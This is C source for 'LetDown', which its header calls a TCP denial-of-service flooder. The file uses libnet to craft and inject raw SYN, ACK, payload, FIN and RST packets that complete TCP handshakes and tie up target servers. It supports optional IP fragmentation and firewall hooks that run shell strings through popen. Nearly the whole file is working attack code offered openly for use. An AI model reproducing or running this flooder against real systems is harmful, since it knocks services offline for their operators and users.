/*
 * LetDown, tcp dos flooder. Raw 3 way handshake...
 * See http://insecure.org/stf/tcp-dos-attack-explained.html
 *
 * Copyright (C) 2008  Acri Emanuele <crossbower@gmail.com>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */
 

#include <pcap.h>
#include <libnet.h>

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <signal.h>
#include <stdint.h>

#include <sys/wait.h>


#define PKT_LEN 8192
#define MAX_CHILD 10

#define DEF_WINDOW 5840

// options struct
struct options progopt; 

// libnet stuff
libnet_t *l;

// pcap stuff
pcap_t *handle;
struct bpf_program fp;

u_int32_t size_ip;
u_int32_t size_tcp;
u_int32_t size_payload;

// ip stuff
u_int32_t src_ip, dst_ip;
u_int32_t ipid;

// tpc stuff
u_int32_t my_seq, my_ack, host_seq, host_ack;
u_int16_t host_len=0, deja_acked=0;

// port stuff
u_int16_t src_prt;
u_int16_t start_prt;
u_int16_t end_prt;
u_int16_t dst_prt;


/*
 * Ethernet header
 */
struct sniff_ethernet {
        u_char  ether_dhost[ETHER_ADDR_LEN];    /* destination host address */
        u_char  ether_shost[ETHER_ADDR_LEN];    /* source host address */
        u_short ether_type;                     /* IP? ARP? RARP? etc */
};
#define SIZE_ETHERNET 14
//#define ETHER_ADDR_LEN    6


/*
 * IP header
 */
struct sniff_ip {
        u_char  ip_vhl;                 /* version << 4 | header length >> 2 */
        u_char  ip_tos;                 /* type of service */
        u_short ip_len;                 /* total length */
        u_short ip_id;                  /* identification */
        u_short ip_off;                 /* fragment offset field */
        #define IP_RF 0x8000            /* reserved fragment flag */
        #define IP_DF 0x4000            /* dont fragment flag */
        #define IP_MF 0x2000            /* more fragments flag */
        #define IP_OFFMASK 0x1fff       /* mask for fragmenting bits */
        u_char  ip_ttl;                 /* time to live */
        u_char  ip_p;                   /* protocol */
        u_short ip_sum;                 /* checksum */
        struct  in_addr ip_src,ip_dst;  /* source and dest address */
};
#define IP_HL(ip)               (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)                (((ip)->ip_vhl) >> 4)


/*
 * TCP header
 */
typedef u_int tcp_seq;

struct sniff_tcp {
        u_short th_sport;               /* source port */
        u_short th_dport;               /* destination port */
        tcp_seq th_seq;                 /* sequence number */
        tcp_seq th_ack;                 /* acknowledgement number */
        u_char  th_offx2;               /* data offset, rsvd */
#define TH_OFF(th)      (((th)->th_offx2 & 0xf0) >> 4)
        u_char  th_flags;
        #define TH_FIN  0x01
        #define TH_SYN  0x02
        #define TH_RST  0x04
        #define TH_PUSH 0x08
        #define TH_ACK  0x10
        #define TH_URG  0x20
        #define TH_ECE  0x40
        #define TH_CWR  0x80
        #define TH_FLAGS        (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR)
        u_short th_win;                 /* window */
        u_short th_sum;                 /* checksum */
        u_short th_urp;                 /* urgent pointer */
};


/*
 * Enable firewall rule
 */
void firewall_on(struct options *opt)
{    
    FILE *p;
    
    if(progopt.firewall[0][0]!='\0') {
        p = popen(opt->firewall[0], "r");
        pclose(p);
    }
}

/*
 * Disable firewall rule
 */
void firewall_off(struct options *opt)
{
    FILE *p;
    
    if(progopt.firewall[1][0]!='\0') {
        p = popen(opt->firewall[1], "r");
        pclose(p);
    }
}


/*
 * Resend last packet
 */
int resend_last()
{
    // packet injection
    return libnet_write(l);
}

/*
 * Prepare IP packet
 */
void prep_ipv4(libnet_t *lc, struct sniff_ip *ip, struct sniff_tcp *tcp)
{
    
    // build ip
    libnet_build_ipv4 (
        LIBNET_IPV4_H + LIBNET_TCP_H, /* size of the packet */
        IPTOS_LOWDELAY,               /* IP tos */
        ipid++,                       /* IP ID */
        0,                            /* frag stuff */
        128,                          /* TTL */
        IPPROTO_TCP,                  /* transport protocol */
        0,                            /* checksum */
        src_ip,                       /* source IP */
        dst_ip,                       /* destination IP */
        NULL,                         /* payload */
        0,                            /* payload length */
        lc,                           /* libnet context */
        0                             /* build new header */
    );
}

/*
 * Prepare IP packet + payload
 */
void prep_ipv4_payl(libnet_t *lc, struct sniff_ip *ip, struct sniff_tcp *tcp, int size)
{
    
    // build ip
    libnet_build_ipv4 (
        LIBNET_IPV4_H + LIBNET_TCP_H + size, /* size of the packet */
        IPTOS_LOWDELAY,      /* IP tos */
        ipid++,              /* IP ID */
        0,                   /* frag stuff */
        128,                 /* TTL */
        IPPROTO_TCP,         /* transport protocol */
        0,                   /* checksum */
        src_ip,              /* source IP */
        dst_ip,              /* destination IP */
        NULL,                /* payload */
        0,                   /* payload length */
        lc,                  /* libnet context */
        0                    /* build new header */
    );
}

/*
 * Prepare IP packet + payload
 */
void prep_ipv4_payl_frag(libnet_t *lc, struct sniff_ip *ip, struct sniff_tcp *tcp, int size)
{
    
    // build ip
    libnet_build_ipv4 (
        LIBNET_IPV4_H + LIBNET_TCP_H + size, /* size of the packet */
        IPTOS_LOWDELAY,      /* IP tos */
        ipid++,              /* IP ID */
        progopt.frag/8,      /* frag stuff */
        128,                 /* TTL */
        IPPROTO_TCP,         /* transport protocol */
        0,                   /* checksum */
        src_ip,              /* source IP */
        dst_ip,              /* destination IP */
        NULL,                /* payload */
        0,                   /* payload length */
        lc,                  /* libnet context */
        0                    /* build new header */
    );
}

/*
 * Send TCP SYN packet
 */
int send_tcp_syn(struct sniff_ip *ip, struct sniff_tcp *tcp)
{

    // clear
    libnet_clear_packet(l);
    
    // tcp stuff
    my_seq = 1;
    my_ack = 0;
    
    host_seq = 0;
    host_ack = 0;
    host_len = 0;

    // build tcp
    libnet_build_tcp(
        src_prt,            /* source TCP port */
        dst_prt,            /* destination TCP port */
        my_seq,           /* sequence number */
        my_ack,           /* acknowledgement number */
        TH_SYN,             /* control flags */
        DEF_WINDOW,         /* window size */
        0,                  /* checksum */
        0,                  /* urgent pointer */
        LIBNET_TCP_H,       /* total length */
        NULL,               /* payload */
        0,                  /* payload length */
        l,                  /* libnet context */
        0                   /* build new header */
    );

    // prepare ip packet
    prep_ipv4(l, ip, tcp);

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP ACK packet (hadshake)
 */
int send_tcp_start_ack(struct sniff_ip *ip, struct sniff_tcp *tcp)
{

    // clear
    libnet_clear_packet(l);
    
    // tcp stuff
    my_seq = 2;
    my_ack = ntohl(tcp->th_seq)+1;
    
    // build tcp
    libnet_build_tcp(
        src_prt,            /* source TCP port */
        dst_prt,            /* destination TCP port */
        my_seq,           /* sequence number */
        my_ack,           /* acknowledgement number */
        TH_ACK,             /* control flags */
        DEF_WINDOW,         /* window size */
        0,                  /* checksum */
        0,                  /* urgent pointer */
        LIBNET_TCP_H,       /* total length */
        NULL,               /* payload */
        0,                  /* payload length */
        l,                  /* libnet context */
        0                   /* build new header */
    );

    // prepare ip packet
    prep_ipv4(l, ip, tcp);

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP ACK packet (end of connection)
 */
int send_tcp_end_ack(struct sniff_ip *ip, struct sniff_tcp *tcp)
{

    // clear
    libnet_clear_packet(l);
    
    // tcp stuff
    my_seq = ntohl(tcp->th_ack);
    my_ack = ntohl(tcp->th_seq) + 1;
    
    // build tcp
    libnet_build_tcp(
        src_prt,            /* source TCP port */
        dst_prt,            /* destination TCP port */
        my_seq,           /* sequence number */
        my_ack,           /* acknowledgement number */
        TH_ACK,             /* control flags */
        DEF_WINDOW,         /* window size */
        0,                  /* checksum */
        0,                  /* urgent pointer */
        LIBNET_TCP_H,       /* total length */
        NULL,               /* payload */
        0,                  /* payload length */
        l,                  /* libnet context */
        0                   /* build new header */
    );

    // prepare ip packet
    prep_ipv4(l, ip, tcp);

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP ACK payload packet
 */
int send_tcp_payload(struct sniff_ip *ip, struct sniff_tcp *tcp, char *payload)
{

    // clear
    libnet_clear_packet(l);
    
    // increment ack number?
    if(!deja_acked) {
        my_seq = ntohl(tcp->th_ack);
        my_ack = my_ack + size_payload;
        deja_acked = 1;
    }

    // build tcp
    libnet_build_tcp(
        src_prt,              /* source TCP port */
        dst_prt,              /* destination TCP port */
        my_seq,             /* sequence number */
        my_ack,             /* acknowledgement number */
        TH_ACK,               /* control flags */
        progopt.window,       /* window size */
        0,                    /* checksum */
        0,                    /* urgent pointer */
        LIBNET_TCP_H +
        (payload[0]!='\0' ? strlen(payload) : 0), /* total length */
        (payload[0]!='\0' ? payload : NULL), /* payload */
        (payload[0]!='\0' ? strlen(payload) : 0), /* payload length */
        l,                    /* libnet context */
        0                     /* build new header */
    );
    
    // prepare ip packet
    if(progopt.payload[0]!='\0') {
        
        // fragmentation
        if(progopt.frag) {
            prep_ipv4_payl_frag(l, ip, tcp, strlen(progopt.payload));
        }
        else {
            prep_ipv4_payl(l, ip, tcp, strlen(progopt.payload));
        }
        
    } else {
        prep_ipv4(l, ip, tcp);
    }

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP PUSH-ACK payload packet
 */
int send_tcp_payload_push(struct sniff_ip *ip, struct sniff_tcp *tcp, char *payload)
{

    // clear
    libnet_clear_packet(l);
    
    // increment ack number?
    if(!deja_acked) {
        my_seq = ntohl(tcp->th_ack);
        my_ack = my_ack + size_payload;
        deja_acked = 1;
    }

    // build tcp
    libnet_build_tcp(
        src_prt,              /* source TCP port */
        dst_prt,              /* destination TCP port */
        my_seq,             /* sequence number */
        my_ack,             /* acknowledgement number */
        TH_PUSH|TH_ACK,       /* control flags */
        progopt.window,       /* window size */
        0,                    /* checksum */
        0,                    /* urgent pointer */
        LIBNET_TCP_H +
        (payload[0]!='\0' ? strlen(payload) : 0), /* total length */
        (payload[0]!='\0' ? payload : NULL), /* payload */
        (payload[0]!='\0' ? strlen(payload) : 0), /* payload length */
        l,                    /* libnet context */
        0                     /* build new header */
    );
    
    // prepare ip packet
    if(progopt.payload[0]!='\0') {
    
        // fragmentation
        if(progopt.frag) {
            prep_ipv4_payl_frag(l, ip, tcp, strlen(progopt.payload));
        }
        else {
            prep_ipv4_payl(l, ip, tcp, strlen(progopt.payload));
        }
        
    } else {
        prep_ipv4(l, ip, tcp);
    }

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP ACK packet
 */
int send_tcp_ack(struct sniff_ip *ip, struct sniff_tcp *tcp)
{

    // clear
    libnet_clear_packet(l);
    
    // tcp stuff
    my_seq = ntohl(tcp->th_ack);
    
    // increment ack sequence number
    my_ack = my_ack + size_payload;
    deja_acked = 1;
    
    // build tcp
    libnet_build_tcp(
        src_prt,            /* source TCP port */
        dst_prt,            /* destination TCP port */
        my_seq,             /* sequence number */
        my_ack,             /* acknowledgement number */
        TH_ACK,             /* control flags */
        progopt.window,     /* window size */
        0,                  /* checksum */
        0,                  /* urgent pointer */
        LIBNET_TCP_H,       /* total length */
        NULL,               /* payload */
        0,                  /* payload length */
        l,                  /* libnet context */
        0                   /* build new header */
    );
    
    // prepare ip packet
    prep_ipv4(l, ip, tcp);

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP FIN-ACK packet
 */
int send_tcp_fin_ack(struct sniff_ip *ip, struct sniff_tcp *tcp)
{

    // clear
    libnet_clear_packet(l);

    // tcp stuff
    my_seq = ntohl(tcp->th_ack);
    //my_ack = my_ack + 1;
    
    // build tcp
    libnet_build_tcp(
        src_prt,            /* source TCP port */
        dst_prt,            /* destination TCP port */
        my_seq,             /* sequence number */
        my_ack,             /* acknowledgement number */
        TH_FIN|TH_ACK,      /* control flags */
        DEF_WINDOW,         /* window size */
        0,                  /* checksum */
        0,                  /* urgent pointer */
        LIBNET_TCP_H,       /* total length */
        NULL,               /* payload */
        0,                  /* payload length */
        l,                  /* libnet context */
        0                   /* build new header */
    );
    
    // prepare ip packet
    prep_ipv4(l, ip, tcp);

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP FIN packet
 */
int send_tcp_fin(struct sniff_ip *ip, struct sniff_tcp *tcp)
{

    // clear
    libnet_clear_packet(l);
    
    // tcp stuff
    my_seq = ntohl(tcp->th_ack);
    my_ack = 0;

    // build tcp
    libnet_build_tcp(
        src_prt,            /* source TCP port */
        dst_prt,            /* destination TCP port */
        my_seq,             /* sequence number */
        my_ack,             /* acknowledgement number */
        TH_FIN,             /* control flags */
        DEF_WINDOW,         /* window size */
        0,                  /* checksum */
        0,                  /* urgent pointer */
        LIBNET_TCP_H,       /* total length */
        NULL,               /* payload */
        0,                  /* payload length */
        l,                  /* libnet context */
        0                   /* build new header */
    );
    
    // prepare ip packet
    prep_ipv4(l, ip, tcp);

    // packet injection
    return libnet_write(l);
}

/*
 * Send TCP RST packet
 */
int send_tcp_rst(struct sniff_ip *ip, struct sniff_tcp *tcp)
{

    // clear
    libnet_clear_packet(l);
    
    // tcp stuff
    my_seq = ntohl(tcp->th_ack);
    my_ack = 0;
    
    // build tcp
    libnet_build_tcp(
        src_prt,            /* source TCP port */
        dst_prt,            /* destination TCP port */
        my_seq,             /* sequence number */
        my_ack,             /* acknowledgement number */
        TH_RST,             /* control flags */
        DEF_WINDOW,         /* window size */
        0,                  /* checksum */
        0,                  /* urgent pointer */
        LIBNET_TCP_H,       /* total length */
        NULL,               /* payload */
        0,                  /* payload length */
        l,                  /* libnet context */
        0                   /* build new header */
    );
    
    // prepare ip packet
    prep_ipv4(l, ip, tcp);

    // packet injection
    return libnet_write(l);
}


